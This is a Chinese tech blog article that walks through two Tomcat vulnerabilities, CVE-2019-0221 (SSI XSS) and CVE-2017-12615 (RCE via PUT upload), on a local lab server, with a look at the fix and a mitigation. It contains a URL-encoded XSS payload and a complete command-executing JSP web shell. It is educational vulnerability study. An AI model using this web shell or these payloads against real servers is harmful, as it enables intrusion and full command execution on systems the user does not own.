當前位置:首頁 > 公眾號精選 > 架構師社區(qū)
[導讀]Tomcat是一個開源的輕量級Web應用服務器,在我們平常工作過程中接觸得非常多。代碼也非常經(jīng)典,很多人為了提升自己的技術也會去閱讀學習Tomcat的源碼。但正如著名詩人李白所說的:世界上本沒有漏洞,使用的人多了,也就發(fā)現(xiàn)了漏洞。比如今年的2月份就爆出了存

我成功攻擊了Tomcat服務器,大佬們的反應亮了


Tomcat是一個開源的輕量級Web應用服務器,在我們平常工作過程中接觸得非常多。代碼也非常經(jīng)典,很多人為了提升自己的技術也會去閱讀學習Tomcat的源碼。但正如著名詩人李白所說的:世界上本沒有漏洞,使用的人多了,也就發(fā)現(xiàn)了漏洞。比如今年的2月份就爆出了存在文件包含漏洞。今天我們選擇兩個比較直觀的Tomcat漏洞去模擬整個漏洞被攻擊的過程,以及漏洞為什么會產(chǎn)生,Tomcat大神們又是如何應對的。

我成功攻擊了Tomcat服務器,大佬們的反應亮了


01


攻擊一:XSS攻擊


一、SSI技術說明

首先演示的漏洞和Tomcat的SSI功能有關,SSI是什么

SSI技術,也叫作Serve Side Includes,SSI(服務器端包含)是放置在HTML頁面中的指令,并在服務頁面時在服務器上對其進行評估。它們使您可以將動態(tài)生成的內(nèi)容添加到現(xiàn)有的HTML頁面,而不必通過CGI程序或其他動態(tài)技術來提供整個頁面。使用SSI技術文件默認的后綴名為.shtml; 

舉例:我們可以將指令放置到現(xiàn)有的HTML頁面中,例如:

!--#echo var="DATE_LOCAL" -->

當該頁面被執(zhí)行時,將會顯示如下結果

Sunday, 22-March-2020 18:28:54 GMT

SSI最常見的用途之一:輸出CGI程序的結果,例如``命中計數(shù)器''。關于該技術更為詳細的說明參見:http://httpd.apache.org/docs/current/howto/ssi.html


二、為Tomcat開啟SSI

1. 準備好JRE、tomcat環(huán)境,我選擇的是“apache-tomcat-9.0.10” (該漏洞受影響的版本有:Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 )

2. 修改conf/context.xml第19行,開啟權限

<Context privileged="true">

3. 修改conf\web.xml,開啟SSI Servlet。該段代碼默認是被注釋掉的,我們刪除注釋即可,代碼在310-322行。

<servlet> <servlet-name>ssi</servlet-name> <servlet-class> org.apache.catalina.ssi.SSIServlet </servlet-class> <init-param> <param-name>buffered</param-name> <param-value>1</param-value> </init-param> <init-param> <param-name>debug</param-name> <param-value>0</param-value> </init-param> <init-param> <param-name>expires</param-name> <param-value>666</param-value> </init-param> <init-param> <param-name>isVirtualWebappRelative</param-name> <param-value>false</param-value> </init-param> <load-on-startup>4</load-on-startup> </servlet>

去掉關于ssi配置的注釋 422-425行

 <servlet-mapping> <servlet-name>ssi</servlet-name> <url-pattern>*.shtml</url-pattern> </servlet-mapping>

4. 在根目錄下添加madashu_env.shtml(習慣性命名為printEnv.shtml)文件,位于webapps/ROOT/ssi/

<html><head><title></title><body>Echo: <!--#echo var="QUERY_STRING_UNESCAPED" --><br/><br/>Env: <!--#printenv --></body></html>

5. 啟動Tomcat即可


三、發(fā)起攻擊

1. 我們輸入以下url看下效果

http://localhost:8080/ssi/madashu_env.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EHello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%3C/h1%3E%3Cbr/%3E%3Cbr/%3E

我成功攻擊了Tomcat服務器,大佬們的反應亮了

2. XSS注入


  
http://localhost:8080/ssi/madashu_env.shtml?%3Cscript%3Ealert(%27Hello%20Tomcat%EF%BC%8C%E7%A0%81%E5%A4%A7%E5%8F%94%E5%88%B0%E6%AD%A4%E4%B8%80%E6%B8%B8%27)%3C/script%3E
攻擊成功,頁面展示如下。

我成功攻擊了Tomcat服務器,大佬們的反應亮了

通過這種方式我們使用戶加載并執(zhí)行攻擊者惡意制造的網(wǎng)頁程序,攻擊者還可能得到包括但不限于更高的權限(如執(zhí)行一些操作)、私密網(wǎng)頁內(nèi)容、會話和cookie等各種內(nèi)容。


四、源碼分析

漏洞產(chǎn)生后,Tomcat大神們迅速修復了該漏洞,我們從Github上找到當時的代碼修復提交記錄:

https://github.com/apache/tomcat/commit/15fcd166ea2c1bb79e8541b8e1a43da9c452ceea

我成功攻擊了Tomcat服務器,大佬們的反應亮了


說真的,當時看到這段修復代碼我是驚呆了,這是什么騷操作?。?!“entity”又是什么鬼?。?!

我成功攻擊了Tomcat服務器,大佬們的反應亮了


于是接下往下翻代碼

我成功攻擊了Tomcat服務器,大佬們的反應亮了

這個地方將我們輸入的變量值直接輸出到了網(wǎng)頁,很明顯剛剛的entity應該是進行了轉碼。我們找到SSIMediator.java文件,路徑org.apache.catalina.ssi. SSIMediator

我成功攻擊了Tomcat服務器,大佬們的反應亮了


我成功攻擊了Tomcat服務器,大佬們的反應亮了


我成功攻擊了Tomcat服務器,大佬們的反應亮了


這樣我們一下子就明白過來了,當發(fā)現(xiàn)是“entity”編碼,會將輸入的內(nèi)容進行Escape,從而避免了XSS。
估計大神們當時也是緊急出了個hotfix版本,直接把參數(shù)寫死成“entity”。還有作為Web服務器,
大神們竟然也會犯這么低級別的錯誤,所以這也解釋了為什么不存在0Bug的系統(tǒng),哈哈!去翻看最新的SSIPrintenv.java文件,已經(jīng)把“entity”定義成常量了,這才專業(yè)嘛!

我成功攻擊了Tomcat服務器,大佬們的反應亮了


02


攻擊二:遠程代碼執(zhí)行


接下來再簡單演示下遠程代碼執(zhí)行漏洞,該漏洞為高危漏洞,即使是非默認配置,但是一旦存在漏洞,那么攻擊者可以成功上傳 Webshell,并控制服務器。


1. 通過put方式上傳文件,請求進行中時進行攔截:


我成功攻擊了Tomcat服務器,大佬們的反應亮了


2. 生成惡意文件,取名叫jiansheng.jsp

我成功攻擊了Tomcat服務器,大佬們的反應亮了


<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>


3. 遠程上傳成功,接下來就可以愉快地在這個不屬于我們自己的tomcat里玩耍了

我成功攻擊了Tomcat服務器,大佬們的反應亮了

整個代碼也是比較簡單的,可以翻看JspServlet.java,這里就不做演示了。

說明:該漏洞影響范圍非常廣,從 5.x 到 9.x 全部中槍。最好的解決方式是將 conf/web.xml 中對于 DefaultServlet 的 readonly 設置為 true。



【結語】興趣是最好的老師,我們通過去看大佬們掉過的坑,寫過的代碼,站在巨人的肩膀人可以更快速地提升自己。有興趣的小伙伴可以去看看Tomcat已爆出的漏洞:

http://tomcat.apache.org/security-9.html
本次演示的兩個漏洞分別是CVE-2019-0221,CVE-2017-12615。


特別推薦一個分享架構+算法的優(yōu)質內(nèi)容,還沒關注的小伙伴,可以長按關注一下:

我成功攻擊了Tomcat服務器,大佬們的反應亮了

長按訂閱更多精彩▼

我成功攻擊了Tomcat服務器,大佬們的反應亮了

如有收獲,點個在看,誠摯感謝

免責聲明:本文內(nèi)容由21ic獲得授權后發(fā)布,版權歸原作者所有,本平臺僅提供信息存儲服務。文章僅代表作者個人觀點,不代表本平臺立場,如有問題,請聯(lián)系我們,謝謝!

本站聲明: 本文章由作者或相關機構授權發(fā)布,目的在于傳遞更多信息,并不代表本站贊同其觀點,本站亦不保證或承諾內(nèi)容真實性等。需要轉載請聯(lián)系該專欄作者,如若文章內(nèi)容侵犯您的權益,請及時聯(lián)系本站刪除。
換一批
延伸閱讀

9月2日消息,不造車的華為或將催生出更大的獨角獸公司,隨著阿維塔和賽力斯的入局,華為引望愈發(fā)顯得引人矚目。

關鍵字: 阿維塔 塞力斯 華為

加利福尼亞州圣克拉拉縣2024年8月30日 /美通社/ -- 數(shù)字化轉型技術解決方案公司Trianz今天宣布,該公司與Amazon Web Services (AWS)簽訂了...

關鍵字: AWS AN BSP 數(shù)字化

倫敦2024年8月29日 /美通社/ -- 英國汽車技術公司SODA.Auto推出其旗艦產(chǎn)品SODA V,這是全球首款涵蓋汽車工程師從創(chuàng)意到認證的所有需求的工具,可用于創(chuàng)建軟件定義汽車。 SODA V工具的開發(fā)耗時1.5...

關鍵字: 汽車 人工智能 智能驅動 BSP

北京2024年8月28日 /美通社/ -- 越來越多用戶希望企業(yè)業(yè)務能7×24不間斷運行,同時企業(yè)卻面臨越來越多業(yè)務中斷的風險,如企業(yè)系統(tǒng)復雜性的增加,頻繁的功能更新和發(fā)布等。如何確保業(yè)務連續(xù)性,提升韌性,成...

關鍵字: 亞馬遜 解密 控制平面 BSP

8月30日消息,據(jù)媒體報道,騰訊和網(wǎng)易近期正在縮減他們對日本游戲市場的投資。

關鍵字: 騰訊 編碼器 CPU

8月28日消息,今天上午,2024中國國際大數(shù)據(jù)產(chǎn)業(yè)博覽會開幕式在貴陽舉行,華為董事、質量流程IT總裁陶景文發(fā)表了演講。

關鍵字: 華為 12nm EDA 半導體

8月28日消息,在2024中國國際大數(shù)據(jù)產(chǎn)業(yè)博覽會上,華為常務董事、華為云CEO張平安發(fā)表演講稱,數(shù)字世界的話語權最終是由生態(tài)的繁榮決定的。

關鍵字: 華為 12nm 手機 衛(wèi)星通信

要點: 有效應對環(huán)境變化,經(jīng)營業(yè)績穩(wěn)中有升 落實提質增效舉措,毛利潤率延續(xù)升勢 戰(zhàn)略布局成效顯著,戰(zhàn)新業(yè)務引領增長 以科技創(chuàng)新為引領,提升企業(yè)核心競爭力 堅持高質量發(fā)展策略,塑強核心競爭優(yōu)勢...

關鍵字: 通信 BSP 電信運營商 數(shù)字經(jīng)濟

北京2024年8月27日 /美通社/ -- 8月21日,由中央廣播電視總臺與中國電影電視技術學會聯(lián)合牽頭組建的NVI技術創(chuàng)新聯(lián)盟在BIRTV2024超高清全產(chǎn)業(yè)鏈發(fā)展研討會上宣布正式成立。 活動現(xiàn)場 NVI技術創(chuàng)新聯(lián)...

關鍵字: VI 傳輸協(xié)議 音頻 BSP

北京2024年8月27日 /美通社/ -- 在8月23日舉辦的2024年長三角生態(tài)綠色一體化發(fā)展示范區(qū)聯(lián)合招商會上,軟通動力信息技術(集團)股份有限公司(以下簡稱"軟通動力")與長三角投資(上海)有限...

關鍵字: BSP 信息技術
關閉
關閉